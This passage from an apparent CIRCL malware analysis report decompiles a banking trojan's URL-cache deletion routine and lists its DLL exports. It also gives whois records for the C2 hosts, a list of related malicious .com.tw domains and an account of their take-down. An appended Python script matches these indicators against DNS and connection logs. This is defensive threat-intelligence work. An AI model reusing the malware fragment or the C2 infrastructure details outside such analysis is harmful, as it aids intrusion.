signed int __stdcall delete_URL_from_UrlCache(LPCSTR URL)
{
    HLOCAL hMem;               // edi@1
    HANDLE UrlCacheEntry;      // ebx@2
    signed int ret;            // [sp+8h] [bp-8h]@1
    DWORD cbCacheEntryInfo;    // [sp+Ch] [bp-4h]@1

    ret = 0;
    cbCacheEntryInfo = 4096;
    hMem = LocalAlloc(0x40u, 0x1000u);
    if (hMem)
    {
        UrlCacheEntry = FindFirstUrlCacheEntryA(0, hMem, &cbCacheEntryInfo);
        if (UrlCacheEntry)
        {
            ret = 1;
            do
            {
                if (StrStrIA(*(hMem + 1), URL))
                    DeleteUrlCacheEntry(*(hMem + 1));
                cbCacheEntryInfo = 4096;
            }
            while (FindNextUrlCacheEntryA(UrlCacheEntry, hMem, &cbCacheEntryInfo));
            FindCloseUrlCache(UrlCacheEntry);
        }
        LocalFree(hMem);
    }
    return ret;
}
```

**D. Exports**

*1. ctfmreg.dll*

```
Flags          : 00000000
Time stamp     : Tue Mar 13 20:32:46 2012
Version        : 0.0
DLL name       : client.dll
Ordinals base  : 1. (00000001)
# of Addresses : 46. (0000002E)
# of Names     : 46. (0000002E)

 1. 00011F9D CreateProcessNotify
 2. 000054B3 RefreshAppRegEnum
 3. 000028C6 DestroyOverStructPool
 4. 0000223A ServerGetApplicationType
 5. 000066DC FreeOverStruct
 6. 0000451A OpenAppRegEnum
 7. 00006AA2 GetComputerObject
 8. 00005D02 CallBeginning
 9. 00002C55 ResetCallCount
10. 0000583B OpenComponentLibraryOnStreamEx
11. 000061B1 ReinitOverStruct
12. 00001881 SetActionLogModeSz
13. 00006965 SetSilent
14. 00005A12 OpenComponentLibraryEx
15. 00008AC4 MonitorHandle
16. 00001104 OpenComponentLibraryOnMemEx
17. 00005DBD RegisterApplication
18. 000030DB GetGlobalBabyJITEnabled
19. 00006F0D SetUnimodemTimer
20. 0000125B SetActionLogMode
21. 000074B3 ExecuteAction
22. 00006B9B StopMonitoringHandle
23. 000026A4 SetSetupSave
24. 00008E5B AppRegEnum
25. 00008FC1 CreateOverStructPool
26. 00006097 CreateUnimodemTimer
27. 00006B06 SetupSave
28. 0000435D StartMonitorThread
29. 00006104 DowngradeAPL
30. 00005BDB QueryApplication
31. 00003991 UpdateFromAppChange
32. 000072BC UpdateFromComponentChange
33. 000055BE GetSimpleTableDispenser
34. 00005DB5 SyncDeviceIoControl
35. 00008609 UmPlatformDeinitialize
36. 0000275A CloseAppRegEnum
37. 000010D4 UnregisterApplication
38. 00006937 StopMonitorThread
39. 00007D16 SetSetupOpen
40. 00008C1C CallEnding
41. 00007551 InprocServer32FromString
42. 000062B8 CancelUnimodemTimer
43. 000056C4 SetActionName
44. 00005269 FreeUnimodemTimer
45. 000040E1 SetActionLogFile
46. 00007E53 GetCatalogObject
```

*2. dump_00E30000.bin*

```
Flags          : 00000000
Time stamp     : Tue Mar 13 20:32:46 2012
Version        : 0.0
DLL name       : client.dll
Ordinals base  : 1. (00000001)
# of Addresses : 1. (00000001)
# of Names     : 1. (00000001)

 1. 00001872 CreateProcessNotify
```

**E. Involved hosts and AS numbers**

- wednesltr.com.tw (122.155.165.122)

```
inetnum:      122.155.160.0 - 122.155.191.255
netname:      CAT-IDC2-Service
descr:        CAT IDC2 14th floor
country:      TH
admin-c:      SC1450-AP
tech-c:       CS416-AP
status:       ALLOCATED NON-PORTABLE
remarks:      *** send spam abuse to support@idc.cattelecom.com ***
notify:       support@idc.cattelecom.com
mnt-by:       MAINT-TH-THIX-CAT
mnt-lower:    MAINT-TH-THIX-CAT
mnt-routes:   MAINT-TH-THIX-CAT
mnt-irt:      IRT-CAT-TH
changed:      suchok@cat.net.th 20110112
source:       APNIC

person:       support CAT IDC
nic-hdl:      SC1450-AP
e-mail:       support@idc.cattelecom.com
address:      CAT-IDC Data Comm. Dept. (IDC)
address:      CAT Telecom Public Company Ltd,
address:      72 Charoenkrung Road Bangrak Bangkok THAILAND 10501
address:
phone:        +66-2-6141240-3
fax-no:       +66-2-6142270
country:      TH
changed:      suchok@bulbul.cat.net.th 20070719
mnt-by:       MAINT-NEW
source:       APNIC

person:       CAT-IDC Spamming tracking team
nic-hdl:      CS416-AP
e-mail:       abuse@idc.cattelecom.com
address:      Internet data center department CAT Tower floor 13 72 charenkrung Rd. Bangrak Bangkok
phone:        +66-210-41240
fax-no:       +66-210-41244
country:      TH
changed:      suchok@bulbul.cat.net.th 20091211
mnt-by:       MAINT-NEW
source:       APNIC
```

- masmitnd.com.tw (64.62.146.101)

```
NetRange:       64.62.128.0 - 64.62.255.255
CIDR:           64.62.128.0/17
OriginAS:       AS6939
NetName:        HURRICANE-4
NetHandle:      NET-64-62-128-0-1
Parent:         NET-64-0-0-0-0
NetType:        Direct Allocation
Comment:        ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate:        2002-08-27
Updated:        2012-02-24
Ref:            http://whois.arin.net/rest/net/NET-64-62-128-0-1

OrgName:        Hurricane Electric, Inc.
OrgId:          HURC
Address:        760 Mission Court
City:           Fremont
StateProv:      CA
PostalCode:     94539
Country:        US
RegDate:
Updated:        2011-04-13
Ref:            http://whois.arin.net/rest/org/HURC
ReferralServer: rwhois://rwhois.he.net:4321

OrgTechHandle:  ZH17-ARIN
OrgTechName:    Hurricane Electric
OrgTechPhone:   +1-510-580-4100
OrgTechEmail:   hostmaster@he.net
OrgTechRef:     http://whois.arin.net/rest/poc/ZH17-ARIN

OrgAbuseHandle: ABUSE1036-ARIN
OrgAbuseName:   Abuse Department
OrgAbusePhone:  +1-510-580-4100
OrgAbuseEmail:  abuse@he.net
OrgAbuseRef:    http://whois.arin.net/rest/poc/ABUSE1036-ARIN

RTechHandle:    ZH17-ARIN
RTechName:      Hurricane Electric
RTechPhone:     +1-510-580-4100
RTechEmail:     hostmaster@he.net
RTechRef:       http://whois.arin.net/rest/poc/ZH17-ARIN

RNOCHandle:     ZH17-ARIN
RNOCName:       Hurricane Electric
RNOCPhone:      +1-510-580-4100
RNOCEmail:      hostmaster@he.net
RNOCRef:        http://whois.arin.net/rest/poc/ZH17-ARIN

RAbuseHandle:   ABUSE1036-ARIN
RAbuseName:     Abuse Department
RAbusePhone:    +1-510-580-4100
RAbuseEmail:    abuse@he.net
RAbuseRef:      http://whois.arin.net/rest/poc/ABUSE1036-ARIN
```

- financepfrro.com.tw (195.191.56.240)

```
inetnum:        195.191.56.0 - 195.191.57.255
netname:        AltNet-UA
descr:          PE Kolobov Aleksandr Grigorievich
country:        UA
remarks:        #############################################
remarks:        ### Points of contact for One Host Hosting Center
remarks:        ### SPAM: abuse@onehost.com.ua
remarks:        ### Network security issues: noc@onehost.com.ua
remarks:        ### Customer support: support@onehost.com.ua
remarks:        #############################################
org:            ORG-IKAG2-RIPE
admin-c:        VMK19-RIPE
tech-c:         VMK19-RIPE
status:         ASSIGNED PI
mnt-by:         RIPE-NCC-END-MNT
mnt-lower:      RIPE-NCC-END-MNT
mnt-by:         AS50395-MNT
mnt-routes:     AS50395-MNT
mnt-domains:    AS50395-MNT
source:         RIPE # Filtered

organisation:   ORG-IKAG2-RIPE
org-name:       IP Kolobov Aleksandr Grigorievich
org-type:       other
address:        5uy Kotelynicheskiy alley 12, of. 14
mnt-ref:        NETASSIST-MNT
mnt-by:         NETASSIST-MNT
source:         RIPE # Filtered

person:         Vasiliy M Kamenskiy
address:        ul. Prospert Mira, 47
phone:          +7 495 7832213
nic-hdl:        VMK19-RIPE
mnt-by:         AS50395-MNT
source:         RIPE # Filtered

% Information related to '195.191.56.0/23AS50395'
route:          195.191.56.0/23
descr:          PPoE Network
origin:         AS50395
mnt-by:         AS50395-MNT
source:         RIPE # Filtered
```

- 200.46.204.8

```
inetnum:     200.46.204.0/25
status:      reallocated
owner:       HUB.ORG
ownerid:     PA-HUBO1-LACNIC
responsible: Marc G. Fournier
address:     360 Main Street, Suite 21, 360,
address:     11111 - Panama -
country:     PA
phone:       +902 542 0713 []
owner-c:     MGF
tech-c:      MGF
abuse-c:     MGF
created:     20040129
changed:     20040129
inetnum-up:  200.46.192/20

nic-hdl:     MGF
person:      Marc G. Fournier
e-mail:      scrappy@HUB.ORG
address:     360 Main Street, Suite 21, 360,
address:     B4P1C4 - Wolfville - NS
country:     CA
phone:       +1 902 542 0713 []
created:     20031010
changed:     20031010
```

- 95.143.198.47

```
inetnum:        95.143.198.1 - 95.143.198.254
netname:        serverconnect-cloud-network
descr:          Abuse-mailbox: abuse@serverconnect.se
country:        se
admin-c:        PF4155-RIPE
tech-c:         PF4155-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-SERVERCONNECT
source:         RIPE # Filtered

person:         Peter Forslund
address:        Hyggesvagen 1
phone:          +46 650484444
nic-hdl:        PF4155-RIPE
source:         RIPE # Filtered

% Information related to '95.143.192.0/20AS49770'
route:          95.143.192.0/20
descr:          Servainet-BLK
origin:         AS49770
mnt-by:         MNT-SERVERCONNECT
source:         RIPE # Filtered
```

**F. Related domain information**

These domains have been identified as registered using the same email address 'aster@gmail.com'. With a high probability, these are used with malicious intention.

```
46.102.232.171   maserluk.com.tw.        TTL 600
46.102.232.171   puzillo.com.tw.         TTL 600
46.102.232.171   quaniter.com.tw.        TTL 600
46.102.232.171   qvazglas.com.tw.        TTL 600
64.62.146.100    asteronew.com.tw.       TTL 600
64.62.146.101    as-forum.com.tw.        TTL 600
64.62.146.101    hotmaking.com.tw.       TTL 600
64.62.146.101    MASMITND.COM.TW.        TTL 600
66.197.144.38    VKRMEK.COM.TW.          TTL 600
79.137.214.18    ABC-FORUM.COM.TW.       TTL 600
79.137.214.18    oberon323.com.tw.       TTL 600
79.137.214.18    OREON3.COM.TW.          TTL 600
79.137.214.18    properdom.com.tw.       TTL 600
79.137.214.18    vnuess3.com.tw.         TTL 600
89.201.174.51    gubkabob.com.tw.        TTL 600
91.211.88.39     preon.com.tw.           TTL 600
91.215.218.79    guardalarms.com.        TTL 600
91.215.218.79    shambabu.com.tw.        TTL 600
122.155.165.122  wednesltr.com.tw.       TTL 600
188.247.135.77   NEWLIFEN.COM.TW.        TTL 600
188.247.135.77   WEHAVECHANSE.COM.TW.    TTL 600
194.219.29.152   metdoman.com.           TTL 600
195.191.56.240   financepfrro.com.tw.    TTL 600
195.191.56.240   man-forum.com.tw.       TTL 600
195.191.56.240   mastermi.com.tw.        TTL 600
195.191.56.240   MASTERMI.COM.TW.        TTL 600
195.191.56.240   masterofor.com.tw.      TTL 600
195.191.56.240   membran.com.tw.
```
TTL 600 203.150.230.31 c l o s u r e s o c k s . com . TTL 600 204.93.171.237 DIGMETACPAN.COM.TW. TTL 600 204.93.171.237 newgetp . com . tw . TTL 600 204.93.171.246 g o o d l o k i . com . tw . TTL 600 2 1 2 . 3 6 . 9 . 5 2 apocalp . com . tw . TTL 600 **G.** **Take-down** Based on a previous version of this report, CIRCL in collaboration with various registrars and/or hosters was able to take-down all the identified domains and several IP addresses. Taking down IP addresses or the associated computers unfortunately took much more time and the process is now completed as with the release date of this version of the report. _1._ _Registered domains_ CIRCL asked on July 27 2012 for the take-down of the ’.com.tw’ and ’.com’ domains. All ’.com.tw’ domains were suspended on August 08 2012. The ’.com’ domains were suspended on August 16 2012 _2._ _IP addresses_ Several of the IP addresses are no longer active, for instance the two hardcoded IP addresses (200.46.204.8, 95.143.198.47), but quite a few still are or are active again. Fortunately, the **examined malware mainly relies on DNS (except for the two hardcoded IP addresses)** **and the hardcoded IP addresses are no longer reachable.** 28 -----
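Because the sample resolves its command-and-control hosts through DNS and only falls back to the two hardcoded addresses, a defender can turn Appendix F and G into a simple retrospective check over DNS query logs and connection logs. The script below is an added example and not part of the CIRCL report: the domain list and the two hardcoded IP addresses are copied from the appendix above, while the log line format, the client addresses and the sample log lines are constructed for this example. Matching is done on normalised names (case folded, trailing dot removed, since the passive DNS output mixes both spellings of e.g. MASTERMI.COM.TW) and on a true suffix match, so that a subdomain of a listed domain is caught but an unrelated name that merely ends in the same characters is not.

```python
"""Match the report's domain / IP indicators against DNS and connection logs.

Added example (not part of the CIRCL report): the indicator values come from
Appendix F and G; the log format and sample lines are assumptions/constructed.
"""
import ipaddress
import re
from collections import defaultdict

# Domains from Appendix F (all registered with the same e-mail address).
# Case and trailing dots are normalised before matching.
SNIFULA_DOMAINS_RAW = [
    "maserluk.com.tw.", "puzillo.com.tw.", "quaniter.com.tw.", "qvazglas.com.tw.",
    "asteronew.com.tw.", "as-forum.com.tw.", "hotmaking.com.tw.", "MASMITND.COM.TW.",
    "VKRMEK.COM.TW.", "ABC-FORUM.COM.TW.", "oberon323.com.tw.", "OREON3.COM.TW.",
    "properdom.com.tw.", "vnuess3.com.tw.", "gubkabob.com.tw.", "preon.com.tw.",
    "guardalarms.com.", "shambabu.com.tw.", "wednesltr.com.tw.", "NEWLIFEN.COM.TW.",
    "WEHAVECHANSE.COM.TW.", "metdoman.com.", "financepfrro.com.tw.", "man-forum.com.tw.",
    "mastermi.com.tw.", "MASTERMI.COM.TW.", "masterofor.com.tw.", "membran.com.tw.",
    "closuresocks.com.", "DIGMETACPAN.COM.TW.", "newgetp.com.tw.", "goodloki.com.tw.",
    "apocalp.com.tw.",
]
# The two IP addresses the report states are hardcoded in the sample (Appendix G.2).
SNIFULA_HARDCODED_IPS = {"200.46.204.8", "95.143.198.47"}


def normalize_domain(name: str) -> str:
    """Lower-case and strip the trailing dot so 'MASMITND.COM.TW.' equals 'masmitnd.com.tw'."""
    return name.strip().rstrip(".").lower()


SNIFULA_DOMAINS = {normalize_domain(d) for d in SNIFULA_DOMAINS_RAW}

# Assumed log line formats (constructed for this example, not a real product's format):
#   DNS:  "<ts> <client_ip> query <qname> <qtype>"
#   CONN: "<ts> <client_ip> conn <dst_ip>:<dst_port>"
DNS_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) query (?P<qname>\S+) (?P<qtype>\S+)$")
CONN_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) conn (?P<dst>[\d.]+):(?P<port>\d+)$")


def is_indicator_domain(qname: str) -> bool:
    """True if qname is a listed domain or a subdomain of one (e.g. www.preon.com.tw).

    The suffix check requires a leading dot, so 'notpreon.com.tw' does not match.
    """
    q = normalize_domain(qname)
    return q in SNIFULA_DOMAINS or any(q.endswith("." + d) for d in SNIFULA_DOMAINS)


def is_hardcoded_ip(addr: str) -> bool:
    """True if addr is one of the two hardcoded C2 addresses; invalid input is not an error."""
    try:
        return str(ipaddress.ip_address(addr)) in SNIFULA_HARDCODED_IPS
    except ValueError:
        return False


def scan_logs(lines):
    """Return {client_ip: [reason, ...]} for every client that touched an indicator."""
    hits = defaultdict(list)
    for line in lines:
        m = DNS_RE.match(line)
        if m and is_indicator_domain(m["qname"]):
            hits[m["client"]].append(f"dns:{normalize_domain(m['qname'])}")
            continue
        m = CONN_RE.match(line)
        if m and is_hardcoded_ip(m["dst"]):
            hits[m["client"]].append(f"conn:{m['dst']}:{m['port']}")
    return dict(hits)


# Constructed sample log lines (not real traffic); client addresses are placeholders.
SAMPLE_LOG = [
    "2012-07-25T10:00:01Z 10.0.0.5 query www.example.org A",
    "2012-07-25T10:00:02Z 10.0.0.5 query MASMITND.com.tw A",
    "2012-07-25T10:00:03Z 10.0.0.7 query update.preon.com.tw A",
    "2012-07-25T10:00:04Z 10.0.0.7 conn 200.46.204.8:80",
    "2012-07-25T10:00:05Z 10.0.0.9 conn 192.0.2.10:443",
    "2012-07-25T10:00:06Z 10.0.0.9 query notpreon.com.tw A",
]

if __name__ == "__main__":
    for client, reasons in sorted(scan_logs(SAMPLE_LOG).items()):
        print(client, reasons)
```

Run against the constructed sample, only 10.0.0.5 (lookup of MASMITND.com.tw) and 10.0.0.7 (lookup of a preon.com.tw subdomain plus a connection to 200.46.204.8) are reported; 10.0.0.9 is not, because notpreon.com.tw is not a subdomain of preon.com.tw. Since the domains were suspended in August 2012, a query for one of them after that date still indicates a host that is, or was, infected.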